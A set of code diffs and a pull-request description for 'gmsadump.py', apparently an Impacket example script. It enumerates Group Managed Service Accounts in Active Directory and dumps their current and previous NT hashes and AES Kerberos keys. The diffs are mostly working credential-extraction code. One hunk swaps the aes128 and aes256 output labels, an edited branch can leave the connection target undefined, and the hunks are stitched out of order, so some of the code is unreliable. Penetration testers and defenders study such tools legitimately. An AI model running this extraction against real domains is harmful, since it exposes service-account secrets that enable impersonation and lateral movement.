         except ldap.LDAPSearchError as e:
             logging.debug("SID resolution error for %s: %s", sid_canonical, e)
+            #if the sid resolution failed, we want to store the problematic sid anyways so we dont keep looking it up
             self.__discovered_sid_cache[sid_canonical] = sid_canonical
 
         return sid_canonical
@@ -289,38 +275,32 @@ class GetGMSAPasswords:
                 print("    [*]Readable by:")
                 for p in principals:
                     print(f"      - {p}")
-
-                # check to see if the caller's username is explicitly in the parsed principals
-                """ current_running_user = self.__username.lower()
-                if any(current_running_user == p.split(' (')[0].split('\\')[-1].lower() for p in principals):
-                    print('    [+] Your current user, {} is allowed to read this gMSAs password'.format(self.__username)) """
             else:
                 print("    Readable by: (no principals resolved)")
 
             # the target Managed password
-            pw_raw = self._attr_raw(attrs, "msDS-ManagedPassword")
-            if pw_raw:
+            passw_raw = self._attr_raw(attrs, "msDS-ManagedPassword")
+            if passw_raw:
                 blob = MSDS_MANAGEDPASSWORD_BLOB()
-                blob.fromString(pw_raw)
+                blob.fromString(passw_raw)
 
                 # Strip the trailing UTF-16LE null terminator (2 bytes)
-                current_pw = blob["CurrentPassword"][:-2]
-                nt = self._nt_hash(current_pw)
-                aes128, aes256 = self._kerberos_keys(sam, self.__domain, current_pw)
+                current_passw = blob["CurrentPassword"][:-2]
+                nthash, aes128_keys, aes256_keys = self._extract_credintials_from_blob(current_passw, sam, self.__domain)
 
-                print("    {}::::{}".format(sam, nt))
-                print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, aes256))
-                print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, aes128))
+                print("    {}::::{}".format(sam, nthash))
+                print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, aes128_keys))
+                print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, aes256_keys))
 
                 # Previous password (if the DC has cycled it at least once)
                 if blob["PreviousPassword"]:
-                    prev_pw = blob["PreviousPassword"][:-2]
-                    prev_nt = self._nt_hash(prev_pw)
-                    prev128, prev256 = self._kerberos_keys(sam, self.__domain, prev_pw)
+                    previous_passw = blob["PreviousPassword"][:-2]
+                    previous_nthash, previous_aes128, previous_aes256 = self._extract_credintials_from_blob(previous_passw, sam, self.__domain)
+                    
                     print("\n    [Previous Password]")
-                    print("    {}::::{}".format(sam, prev_nt))
-                    print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, prev256))
-                    print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, prev128))
+                    print("    {}::::{}".format(sam, previous_nthash))
+                    print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, previous_aes128))
+                    print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, previous_aes256))
 
             elif not self.__enumOnly:
                 if self.__tlsActive:
@@ -355,8 +335,16 @@ class GetGMSAPasswords:
 
     def ldap_auth(self):
 
-        target = self.__kdcIP or self.__kdcHost or self.__domain
-        self.__target = target
+        if self.__doKerberos:
+            target = self.__kdcHost or self.__domain
+        if not self.__kdcHost:
+            logging.debug(
+                "[!] No -dc-host provided for Kerberos auth. Using domain FQDN '%s' "
+                "for SPN construction. If this fails with KDC_ERR_S_PRINCIPAL_UNKNOWN, "
+                "add -dc-host <DC_FQDN>.", self.__domain
+            )
+        else:
+            target = self.__kdcIP or self.__kdcHost or self.__domain
 
         scheme = "ldaps" if self.__useLdaps else "ldap"
         url = "{}://{}".format(scheme, target)

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -132,28 +132,21 @@ class GetGMSAPasswords:
         self.__kdcHost      = cmdLineOptions.dc_host
         self.__useLdaps     = cmdLineOptions.use_ldaps
         self.__enumOnly     = cmdLineOptions.enum_only
-        # either a specific gMSA name (wildcards allowed) or a
-        # raw LDAP filter string supplied by the operator
-        self.__gmsaName     = cmdLineOptions.gmsa        #you can use 'svcWeb$' or 'svc*'
+        self.__gmsaName     = cmdLineOptions.gmsa        #you can use 'svcWeb$' or 'svc*' or svcweb as will append $ if not present
         self.__gmsaFilter   = cmdLineOptions.gmsa_filter # raw LDAP addon
-
         if cmdLineOptions.hashes is not None:
             self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
-
         # Build the LDAP base DN from the domain FQDN
         self.baseDN = ','.join('dc=%s' % part for part in self.__domain.split('.'))
-
         # Live connection reference — needed for secondary SID-resolution lookups
         self.__ldapConn = None
-
-        # Tracks whether the channel is confidential (LDAPS, or NTLM session security ENCRYPT)
-        # The DC will only return msDS-ManagedPassword over a confidential channel.
         self.__tlsActive = False
+        self.__discovered_sid_cache = {}
 
     
     # Static helpers that claud said would be more useful than the inline processing I previously had.
     #Apperntly it means others who find similar situations can just copy paste the static helpers and call them instead of reimplement
-    #Credit goes to claud, thanks legend.
+    #Credit goes to AI for these.
 
     @staticmethod
     def _attr_value(item_attributes, attr_type):
@@ -199,7 +192,6 @@ class GetGMSAPasswords:
             <DOMAIN_UPPER>host<sam_no_dollar_lower>.<domain_lower>
         """
         password = password_bytes.decode('utf-16-le', errors='replace').encode('utf-8')
-        #Kinda concenerd this one is not right but I have seen no evidence to suggest why this shouldnt work
         salt = '{}host{}.{}'.format(
             domain.upper(),
             sam.rstrip('$').lower(),
@@ -213,6 +205,8 @@ class GetGMSAPasswords:
 
 
     def _resolve_sid(self, sid_canonical):
+        if sid_canonical in self.__discovered_sid_cache: #prevents unneccesary ldap look ups if we already have the identity details
+            return self.__discovered_sid_cache[sid_canonical]
         
         results = []
 
@@ -235,9 +229,13 @@ class GetGMSAPasswords:
                     self._attr_value(attrs, 'cn')
                 )
                 if resolved:
-                    return '{} ({})'.format(resolved, sid_canonical)
-        except Exception as exc:
-            logging.debug('SID resolution error for %s: %s', sid_canonical, exc)
+                    formated_resolved_name = '{} ({})'.format(resolved, sid_canonical)
+                    self.__discovered_sid_cache[sid_canonical] = formated_resolved_name #store the SID alongside the asscociated object attributes
+                    return formated_resolved_name
+                
+        except ldap.LDAPSearchError as e:
+            logging.debug('SID resolution error for %s: %s', sid_canonical, e)
+            self.__discovered_sid_cache[sid_canonical] = sid_canonical
 
         return sid_canonical
 
@@ -282,7 +280,14 @@ class GetGMSAPasswords:
 
             print('\n[*] Account:    {}'.format(sam))
             if principals:
-                print('    Readable by: {}'.format(', '.join(principals)))
+                print('    [*]Readable by:')
+                for p in principals:
+                    print(f'      - {p}')
+
+                #check to see if the caller's username is explicitly in the parsed principals
+                """ current_running_user = self.__username.lower()
+                if any(current_running_user == p.split(' (')[0].split('\\')[-1].lower() for p in principals):
+                    print('    [+] Your current user, {} is allowed to read this gMSAs password'.format(self.__username)) """
             else:
                 print('    Readable by: (no principals resolved)')
 
@@ -311,14 +316,14 @@ class GetGMSAPasswords:
                     print('    {}::::{}'.format(sam, prev_nt))
                     print('    {}:aes256-cts-hmac-sha1-96:{}'.format(sam, prev256))
                     print('    {}:aes128-cts-hmac-sha1-96:{}'.format(sam, prev128))
-            else:
+            
+            elif not self.__enumOnly:
                 if self.__tlsActive:
-                    print('    [-] msDS-ManagedPassword not returned '
+                    print('[*] msDS-ManagedPassword not returned '
                           '(this account may not be authorised to read it)')
                 else:
                     print('    [-] msDS-ManagedPassword requires a confidential channel '
                           '(use -use-ldaps, or ensure NTLM session security is active)')
-
         except Exception as exc:
             logging.debug('Exception in processGMSAEntry()', exc_info=True)
             logging.error('Skipping item, cannot process due to error %s', str(exc))
@@ -375,7 +380,7 @@ class GetGMSAPasswords:
         
         try:
             self.__ldapConn = self.ldap_auth()
-        except Exception as e:
+        except ldap.LDAPSessionError as e:
             logging.error('Authentication failed: %s', e)
             sys.exit(1)
 
@@ -457,11 +462,8 @@ if __name__ == '__main__':
         logging.critical('Domain should be specified!')
         sys.exit(1)
 
-    try:
-        executer = GetGMSAPasswords(username, password, domain, options)
-        executer.run()
-    except Exception:
-        if logging.getLogger().level == logging.DEBUG:
-            import traceback
-            traceback.print_exc()
-        logging.error('Error')
+    
+    executer = GetGMSAPasswords(username, password, domain, options)
+    executer.run()
+    
+        

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -51,7 +51,6 @@ from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
 from impacket.structure import Structure
 
 
-
 # MS-ADTS MSDS-MANAGEDPASSWORD_BLOB parser
 # Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/
 #      section 2.2.18
@@ -73,18 +72,18 @@ class MSDS_MANAGEDPASSWORD_BLOB(Structure):
     """
 
     structure = (
-        ('Version',                         '<H'),
-        ('Reserved',                        '<H'),
-        ('Length',                          '<L'),
-        ('CurrentPasswordOffset',           '<H'),
-        ('PreviousPasswordOffset',          '<H'),
-        ('QueryPasswordIntervalOffset',     '<H'),
-        ('UnchangedPasswordIntervalOffset', '<H'),
+        ("Version", "<H"),
+        ("Reserved", "<H"),
+        ("Length", "<L"),
+        ("CurrentPasswordOffset", "<H"),
+        ("PreviousPasswordOffset", "<H"),
+        ("QueryPasswordIntervalOffset", "<H"),
+        ("UnchangedPasswordIntervalOffset", "<H"),
         # Variable-length fields — populated in fromString()
-        ('CurrentPassword',                 ':'),
-        ('PreviousPassword',                ':'),
-        ('QueryPasswordInterval',           ':'),
-        ('UnchangedPasswordInterval',       ':'),
+        ("CurrentPassword", ":"),
+        ("PreviousPassword", ":"),
+        ("QueryPasswordInterval", ":"),
+        ("UnchangedPasswordInterval", ":"),
     )
 
     def __init__(self, data=None):
@@ -93,24 +92,22 @@ class MSDS_MANAGEDPASSWORD_BLOB(Structure):
     def fromString(self, data):
         Structure.fromString(self, data)
 
-        cur_off  = self['CurrentPasswordOffset']
-        prev_off = self['PreviousPasswordOffset']
-        qpi_off  = self['QueryPasswordIntervalOffset']
-        upi_off  = self['UnchangedPasswordIntervalOffset']
+        cur_off = self["CurrentPasswordOffset"]
+        prev_off = self["PreviousPasswordOffset"]
+        qpi_off = self["QueryPasswordIntervalOffset"]
+        upi_off = self["UnchangedPasswordIntervalOffset"]
 
         # CurrentPassword ends at PreviousPassword (if present) or QueryPasswordInterval
         cur_end = prev_off if prev_off != 0 else qpi_off
-        self['CurrentPassword'] = self.rawData[cur_off:cur_end]
+        self["CurrentPassword"] = self.rawData[cur_off:cur_end]
 
         if prev_off != 0:
-            self['PreviousPassword'] = self.rawData[prev_off:qpi_off]
+            self["PreviousPassword"] = self.rawData[prev_off:qpi_off]
         else:
-            self['PreviousPassword'] = b''
+            self["PreviousPassword"] = b""
 
-        self['QueryPasswordInterval']     = self.rawData[qpi_off:upi_off]
-        self['UnchangedPasswordInterval'] = self.rawData[upi_off:]
-
-
+        self["QueryPasswordInterval"] = self.rawData[qpi_off:upi_off]
+        self["UnchangedPasswordInterval"] = self.rawData[upi_off:]
 
 
 class GetGMSAPasswords:
@@ -119,34 +116,35 @@ class GetGMSAPasswords:
     """
 
     def __init__(self, username, password, domain, cmdLineOptions):
-        self.options        = cmdLineOptions
-        self.__username     = username
-        self.__password     = password
-        self.__domain       = domain
-        self.__target       = None
-        self.__lmhash       = ''
-        self.__nthash       = ''
-        self.__aesKey       = cmdLineOptions.aesKey
-        self.__doKerberos   = cmdLineOptions.k
-        self.__kdcIP        = cmdLineOptions.dc_ip
-        self.__kdcHost      = cmdLineOptions.dc_host
-        self.__useLdaps     = cmdLineOptions.use_ldaps
-        self.__enumOnly     = cmdLineOptions.enum_only
-        self.__gmsaName     = cmdLineOptions.gmsa        #you can use 'svcWeb$' or 'svc*' or svcweb as will append $ if not present
-        self.__gmsaFilter   = cmdLineOptions.gmsa_filter # raw LDAP addon
+        self.options = cmdLineOptions
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__target = None
+        self.__lmhash = ""
+        self.__nthash = ""
+        self.__aesKey = cmdLineOptions.aesKey
+        self.__doKerberos = cmdLineOptions.k
+        self.__kdcIP = cmdLineOptions.dc_ip
+        self.__kdcHost = cmdLineOptions.dc_host
+        self.__useLdaps = cmdLineOptions.use_ldaps
+        self.__enumOnly = cmdLineOptions.enum_only
+        self.__gmsaName = (
+            cmdLineOptions.gmsa
+        )  # you can use 'svcWeb$' or 'svc*' or svcweb as will append $ if not present
+        self.__gmsaFilter = cmdLineOptions.gmsa_filter  # raw LDAP addon
         if cmdLineOptions.hashes is not None:
-            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
+            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(":")
         # Build the LDAP base DN from the domain FQDN
-        self.baseDN = ','.join('dc=%s' % part for part in self.__domain.split('.'))
+        self.baseDN = ",".join("dc=%s" % part for part in self.__domain.split("."))
         # Live connection reference — needed for secondary SID-resolution lookups
         self.__ldapConn = None
         self.__tlsActive = False
         self.__discovered_sid_cache = {}
 
-    
     # Static helpers that claud said would be more useful than the inline processing I previously had.
-    #Apperntly it means others who find similar situations can just copy paste the static helpers and call them instead of reimplement
-    #Credit goes to AI for these.
+    # Apperntly it means others who find similar situations can just copy paste the static helpers and call them instead of reimplement
+    # Credit goes to AI for these.
 
     @staticmethod
     def _attr_value(item_attributes, attr_type):
@@ -155,12 +153,12 @@ class GetGMSAPasswords:
         ldapasn1 attribute list, or '' if the attribute is absent.
         """
         for attribute in item_attributes:
-            if str(attribute['type']) == attr_type:
+            if str(attribute["type"]) == attr_type:
                 try:
-                    return attribute['vals'][0].asOctets().decode('utf-8')
+                    return attribute["vals"][0].asOctets().decode("utf-8")
                 except Exception:
-                    return ''
-        return ''
+                    return ""
+        return ""
 
     @staticmethod
     def _attr_raw(item_attributes, attr_type):
@@ -169,20 +167,19 @@ class GetGMSAPasswords:
         Used for msDS-ManagedPassword and msDS-GroupMSAMembership.
         """
         for attribute in item_attributes:
-            if str(attribute['type']) == attr_type:
+            if str(attribute["type"]) == attr_type:
                 try:
-                    return bytes(attribute['vals'][0])
+                    return bytes(attribute["vals"][0])
                 except Exception:
                     return None
         return None
-
 
     @staticmethod
     def _nt_hash(password_bytes):
         # password_bytes is already UTF-16LE encoded I believe so nothing more is needed
         md4 = MD4.new()
         md4.update(password_bytes)
-        return hexlify(md4.digest()).decode('ascii')
+        return hexlify(md4.digest()).decode("ascii")
 
     @staticmethod
     def _kerberos_keys(sam, domain, password_bytes):
@@ -191,23 +188,31 @@ class GetGMSAPasswords:
 
             <DOMAIN_UPPER>host<sam_no_dollar_lower>.<domain_lower>
         """
-        password = password_bytes.decode('utf-16-le', errors='replace').encode('utf-8')
-        salt = '{}host{}.{}'.format(
+        password = password_bytes.decode("utf-16-le", errors="replace").encode("utf-8")
+        salt = "{}host{}.{}".format(
             domain.upper(),
-            sam.rstrip('$').lower(),
+            sam.rstrip("$").lower(),
             domain.lower(),
         )
 
-        aes128 = string_to_key(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, password, salt)
-        aes256 = string_to_key(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, password, salt)
+        aes128 = string_to_key(
+            constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, password, salt
+        )
+        aes256 = string_to_key(
+            constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, password, salt
+        )
 
-        return (hexlify(aes128.contents).decode('ascii'), hexlify(aes256.contents).decode('ascii'))
-
+        return (
+            hexlify(aes128.contents).decode("ascii"),
+            hexlify(aes256.contents).decode("ascii"),
+        )
 
     def _resolve_sid(self, sid_canonical):
-        if sid_canonical in self.__discovered_sid_cache: #prevents unneccesary ldap look ups if we already have the identity details
+        if (
+            sid_canonical in self.__discovered_sid_cache
+        ):  # prevents unneccesary ldap look ups if we already have the identity details
             return self.__discovered_sid_cache[sid_canonical]
-        
+
         results = []
 
         def _collect(item):
@@ -217,190 +222,195 @@ class GetGMSAPasswords:
         try:
             self.__ldapConn.search(
                 self.baseDN,
-                searchFilter='(objectSid={})'.format(sid_canonical),
-                attributes=['sAMAccountName', 'name', 'cn'],
+                searchFilter="(objectSid={})".format(sid_canonical),
+                attributes=["sAMAccountName", "name", "cn"],
                 perRecordCallback=_collect,
             )
             if results:
-                attrs = results[0]['attributes']
+                attrs = results[0]["attributes"]
                 resolved = (
-                    self._attr_value(attrs, 'sAMAccountName') or
-                    self._attr_value(attrs, 'name') or
-                    self._attr_value(attrs, 'cn')
+                    self._attr_value(attrs, "sAMAccountName")
+                    or self._attr_value(attrs, "name")
+                    or self._attr_value(attrs, "cn")
                 )
                 if resolved:
-                    formated_resolved_name = '{} ({})'.format(resolved, sid_canonical)
-                    self.__discovered_sid_cache[sid_canonical] = formated_resolved_name #store the SID alongside the asscociated object attributes
+                    formated_resolved_name = "{} ({})".format(resolved, sid_canonical)
+                    self.__discovered_sid_cache[sid_canonical] = (
+                        formated_resolved_name  # store the SID alongside the asscociated object attributes
+                    )
                     return formated_resolved_name
-                
+
         except ldap.LDAPSearchError as e:
-            logging.debug('SID resolution error for %s: %s', sid_canonical, e)
+            logging.debug("SID resolution error for %s: %s", sid_canonical, e)
             self.__discovered_sid_cache[sid_canonical] = sid_canonical
 
         return sid_canonical
 
     def _parse_gmsa_acl(self, raw_sd):
-        
+
         principals = []
         try:
-            sd   = SR_SECURITY_DESCRIPTOR(data=raw_sd)
-            aces = sd['Dacl']['Data']
+            sd = SR_SECURITY_DESCRIPTOR(data=raw_sd)
+            aces = sd["Dacl"]["Data"]
         except Exception as exc:
-            logging.debug('Failed to parse GroupMSAMembership SD: %s', exc)
+            logging.debug("Failed to parse GroupMSAMembership SD: %s", exc)
             return principals
 
         for ace in aces:
             try:
-                sid = ace['Ace']['Sid'].formatCanonical()
+                sid = ace["Ace"]["Sid"].formatCanonical()
                 principals.append(self._resolve_sid(sid))
             except Exception as exc:
-                logging.debug('ACE parse error: %s', exc)
+                logging.debug("ACE parse error: %s", exc)
 
         return principals
 
-
     def processGMSAEntry(self, item):
 
-        #Process a single LDAP SearchResultEntry representing a gMSA object.
-    
+        # Process a single LDAP SearchResultEntry representing a gMSA object.
+
         if not isinstance(item, ldapasn1.SearchResultEntry):
             return
 
         try:
-            attrs = item['attributes']
-            sam   = self._attr_value(attrs, 'sAMAccountName')
+            attrs = item["attributes"]
+            sam = self._attr_value(attrs, "sAMAccountName")
             if not sam:
                 return
 
-            #which principals may read this account's password?
-            acl_raw    = self._attr_raw(attrs, 'msDS-GroupMSAMembership')
+            # which principals may read this account's password?
+            acl_raw = self._attr_raw(attrs, "msDS-GroupMSAMembership")
             principals = []
             if acl_raw:
                 principals = self._parse_gmsa_acl(acl_raw)
 
-            print('\n[*] Account:    {}'.format(sam))
+            print("\n[*] Account:    {}".format(sam))
             if principals:
-                print('    [*]Readable by:')
+                print("    [*]Readable by:")
                 for p in principals:
-                    print(f'      - {p}')
+                    print(f"      - {p}")
 
-                #check to see if the caller's username is explicitly in the parsed principals
+                # check to see if the caller's username is explicitly in the parsed principals
                 """ current_running_user = self.__username.lower()
                 if any(current_running_user == p.split(' (')[0].split('\\')[-1].lower() for p in principals):
                     print('    [+] Your current user, {} is allowed to read this gMSAs password'.format(self.__username)) """
             else:
-                print('    Readable by: (no principals resolved)')
+                print("    Readable by: (no principals resolved)")
 
             # the target Managed password
-            pw_raw = self._attr_raw(attrs, 'msDS-ManagedPassword')
+            pw_raw = self._attr_raw(attrs, "msDS-ManagedPassword")
             if pw_raw:
                 blob = MSDS_MANAGEDPASSWORD_BLOB()
                 blob.fromString(pw_raw)
 
                 # Strip the trailing UTF-16LE null terminator (2 bytes)
-                current_pw     = blob['CurrentPassword'][:-2]
-                nt             = self._nt_hash(current_pw)
+                current_pw = blob["CurrentPassword"][:-2]
+                nt = self._nt_hash(current_pw)
                 aes128, aes256 = self._kerberos_keys(sam, self.__domain, current_pw)
 
-                
-                print('    {}::::{}'.format(sam, nt))
-                print('    {}:aes256-cts-hmac-sha1-96:{}'.format(sam, aes256))
-                print('    {}:aes128-cts-hmac-sha1-96:{}'.format(sam, aes128))
+                print("    {}::::{}".format(sam, nt))
+                print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, aes256))
+                print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, aes128))
 
                 # Previous password (if the DC has cycled it at least once)
-                if blob['PreviousPassword']:
-                    prev_pw         = blob['PreviousPassword'][:-2]
-                    prev_nt         = self._nt_hash(prev_pw)
+                if blob["PreviousPassword"]:
+                    prev_pw = blob["PreviousPassword"][:-2]
+                    prev_nt = self._nt_hash(prev_pw)
                     prev128, prev256 = self._kerberos_keys(sam, self.__domain, prev_pw)
-                    print('\n    [Previous Password]')
-                    print('    {}::::{}'.format(sam, prev_nt))
-                    print('    {}:aes256-cts-hmac-sha1-96:{}'.format(sam, prev256))
-                    print('    {}:aes128-cts-hmac-sha1-96:{}'.format(sam, prev128))
-            
+                    print("\n    [Previous Password]")
+                    print("    {}::::{}".format(sam, prev_nt))
+                    print("    {}:aes256-cts-hmac-sha1-96:{}".format(sam, prev256))
+                    print("    {}:aes128-cts-hmac-sha1-96:{}".format(sam, prev128))
+
             elif not self.__enumOnly:
                 if self.__tlsActive:
-                    print('[*] msDS-ManagedPassword not returned '
-                          '(this account may not be authorised to read it)')
+                    print(
+                        "[*] msDS-ManagedPassword not returned "
+                        "(this account may not be authorised to read it)"
+                    )
                 else:
-                    print('    [-] msDS-ManagedPassword requires a confidential channel '
-                          '(use -use-ldaps, or ensure NTLM session security is active)')
+                    print(
+                        "    [-] msDS-ManagedPassword requires a confidential channel "
+                        "(use -use-ldaps, or ensure NTLM session security is active)"
+                    )
         except Exception as exc:
-            logging.debug('Exception in processGMSAEntry()', exc_info=True)
-            logging.error('Skipping item, cannot process due to error %s', str(exc))
-
+            logging.debug("Exception in processGMSAEntry()", exc_info=True)
+            logging.error("Skipping item, cannot process due to error %s", str(exc))
 
     def _build_GMSA_locate_filter(self):
-        
-        base = '(objectClass=msDS-GroupManagedServiceAccount)'
+
+        base = "(objectClass=msDS-GroupManagedServiceAccount)"
 
         if self.__gmsaFilter:
-            
-            return '(&{}{})'.format(base, self.__gmsaFilter)
+            return "(&{}{})".format(base, self.__gmsaFilter)
 
         if self.__gmsaName:
             name = self.__gmsaName
             # Append the computer-account '$' suffix if the caller omitted it and the name is not a wildcard pattern
-            if not name.endswith('$') and '*' not in name:
-                name += '$'
-            return '(&{}(sAMAccountName={}))'.format(base, name)
+            if not name.endswith("$") and "*" not in name:
+                name += "$"
+            return "(&{}(sAMAccountName={}))".format(base, name)
 
-       
-        return '(&{})'.format(base)
+        return "(&{})".format(base)
 
     def ldap_auth(self):
-        
+
         target = self.__kdcIP or self.__kdcHost or self.__domain
         self.__target = target
 
-        scheme  = 'ldaps' if self.__useLdaps else 'ldap'
-        url     = '{}://{}'.format(scheme, target)
-        basedn  = self.baseDN
+        scheme = "ldaps" if self.__useLdaps else "ldap"
+        url = "{}://{}".format(scheme, target)
+        basedn = self.baseDN
 
-        logging.debug('[*] Connecting to %s', url)
+        logging.debug("[*] Connecting to %s", url)
         ldapConn = ldap.LDAPConnection(url, basedn, self.__kdcIP)
 
         if self.__doKerberos:
-            logging.debug('[*] Authenticating with Kerberos')
+            logging.debug("[*] Authenticating with Kerberos")
             ldapConn.kerberosLogin(
-                self.__username, self.__password, self.__domain,
-                self.__lmhash, self.__nthash, self.__aesKey,
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
+                self.__aesKey,
                 kdcHost=self.__kdcIP,
             )
         else:
-            logging.debug('[*] Authenticating with NTLM')
+            logging.debug("[*] Authenticating with NTLM")
             ldapConn.login(
-                self.__username, self.__password, self.__domain,
-                self.__lmhash, self.__nthash,
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
             )
 
         return ldapConn
-    
 
     def run(self):
-        
+
         try:
             self.__ldapConn = self.ldap_auth()
         except ldap.LDAPSessionError as e:
-            logging.error('Authentication failed: %s', e)
+            logging.error("Authentication failed: %s", e)
             sys.exit(1)
 
-        
         self.__tlsActive = True
         if self.__useLdaps:
-            logging.info('[+] Using LDAPS (port 636).')
+            logging.info("[+] Using LDAPS (port 636).")
         else:
-            logging.info('[+] Using plain LDAP with NTLM Sign+Seal.')
+            logging.info("[+] Using plain LDAP with NTLM Sign+Seal.")
 
-        logging.info('Querying %s for gMSA objects.', self.__target)
+        logging.info("Querying %s for gMSA objects.", self.__target)
 
-    
-        attrs = ['sAMAccountName', 'msDS-GroupMSAMembership']
+        attrs = ["sAMAccountName", "msDS-GroupMSAMembership"]
         if not self.__enumOnly:
-            attrs.append('msDS-ManagedPassword')
+            attrs.append("msDS-ManagedPassword")
 
         search_filter = self._build_GMSA_locate_filter()
-        logging.debug('Search filter: %s', search_filter)
-        logging.debug('Attributes requested: %s', attrs)
+        logging.debug("Search filter: %s", search_filter)
+        logging.debug("Attributes requested: %s", attrs)
 
         sc = ldap.SimplePagedResultsControl(size=100)
         try:
@@ -414,35 +424,82 @@ class GetGMSAPasswords:
             )
         except ldap.LDAPSearchError as exc:
             if exc.error == 0:
-                logging.info('No gMSA objects found in the directory.')
+                logging.info("No gMSA objects found in the directory.")
             else:
                 raise
 
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     print(version.BANNER)
 
-    parser = argparse.ArgumentParser(add_help=True, description='Queries target domain for gMSA data')
-    parser.add_argument('target', action='store', help='domain[/username[:password]]')
-    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
-    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-use-ldaps', action='store_true', default=False, help='Connect via LDAPS (port 636) instead of plain LDAP.')
-    parser.add_argument('-enum', action='store_true', dest='enum_only', help='ACL enumeration only show which principals can read each gMSA password, without credential extraction')
+    parser = argparse.ArgumentParser(
+        add_help=True, description="Queries target domain for gMSA data"
+    )
+    parser.add_argument("target", action="store", help="domain[/username[:password]]")
+    parser.add_argument(
+        "-ts", action="store_true", help="Adds timestamp to every logging output"
+    )
+    parser.add_argument("-debug", action="store_true", help="Turn DEBUG output ON")
+    parser.add_argument(
+        "-use-ldaps",
+        action="store_true",
+        default=False,
+        help="Connect via LDAPS (port 636) instead of plain LDAP.",
+    )
+    parser.add_argument(
+        "-enum",
+        action="store_true",
+        dest="enum_only",
+        help="ACL enumeration only show which principals can read each gMSA password, without credential extraction",
+    )
 
-    group = parser.add_argument_group('targeting')
+    group = parser.add_argument_group("targeting")
     group2 = group.add_mutually_exclusive_group()
-    group2.add_argument('-gmsa', action='store', metavar='account name', help='Requests data for specific gMSA account')
-    group2.add_argument('-gmsa-filter', action='store', metavar='LDAP filter', help='Custom LDAP filter')
+    group2.add_argument(
+        "-gmsa",
+        action="store",
+        metavar="account name",
+        help="Requests data for specific gMSA account",
+    )
+    group2.add_argument(
+        "-gmsa-filter", action="store", metavar="LDAP filter", help="Custom LDAP filter"
+    )
 
-    group = parser.add_argument_group('authentication')
-    group.add_argument('-hashes', action='store', metavar='LMHASH:NTHASH', help='NTLM hashes, format is LMHASH:NTHASH')
-    group.add_argument('-no-pass', action='store_true', help='don\'t ask for password (useful for -k)')
-    group.add_argument('-k', action='store_true', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
-    group.add_argument('-aesKey', action='store', metavar='hex key', help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+    group = parser.add_argument_group("authentication")
+    group.add_argument(
+        "-hashes",
+        action="store",
+        metavar="LMHASH:NTHASH",
+        help="NTLM hashes, format is LMHASH:NTHASH",
+    )
+    group.add_argument(
+        "-no-pass", action="store_true", help="don't ask for password (useful for -k)"
+    )
+    group.add_argument(
+        "-k",
+        action="store_true",
+        help="Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line",
+    )
+    group.add_argument(
+        "-aesKey",
+        action="store",
+        metavar="hex key",
+        help="AES key to use for Kerberos Authentication (128 or 256 bits)",
+    )
 
-    group = parser.add_argument_group('connection')
-    group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller')
-    group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller')
+    group = parser.add_argument_group("connection")
+    group.add_argument(
+        "-dc-ip",
+        action="store",
+        metavar="ip address",
+        help="IP Address of the domain controller",
+    )
+    group.add_argument(
+        "-dc-host",
+        action="store",
+        metavar="hostname",
+        help="Hostname of the domain controller",
+    )
 
     if len(sys.argv) == 1:
         parser.print_help()
@@ -452,18 +509,17 @@ if __name__ == '__main__':
     logger.init(options.ts, options.debug)
 
     if options.gmsa_filter is not None:
-        if options.gmsa_filter.startswith('(') is False:
-            logging.critical('Bad LDAP filter')
+        if options.gmsa_filter.startswith("(") is False:
+            logging.critical("Bad LDAP filter")
             sys.exit(1)
 
-    domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
+    domain, username, password, _, _, options.k = parse_identity(
+        options.target, options.hashes, options.no_pass, options.aesKey, options.k
+    )
 
-    if domain is None or domain == '':
-        logging.critical('Domain should be specified!')
+    if domain is None or domain == "":
+        logging.critical("Domain should be specified!")
         sys.exit(1)
 
-    
     executer = GetGMSAPasswords(username, password, domain, options)
     executer.run()
-    
-        


### PR DESCRIPTION
Hi there!

This PR adds `gmsadump.py`, a new example script for enumerating Group Managed Service Accounts (gMSAs) as well as extracting their current(and previous) NT, and AES kerberos keys credentials. This script is heavily based on https://github.com/micahvandeusen/gMSADumper

Many differences exist but credit goes to micahvandeusen for doing a lot of the heavy lifting. Additionally, this script was also a team effort by myself and @chin-tech

Additionally, all ldap3 elements from gMSADumper were extracted in favor of impackets. Mainly due to the fact that ldap3 cant support connecting to a DC enforcing LDAP signing using NTLM(no sasl support).

## Features

* enumerate gMSA objects, identifying users/groups/ous etc that can read their passwords
* identify principals allowed to read each gMSA password
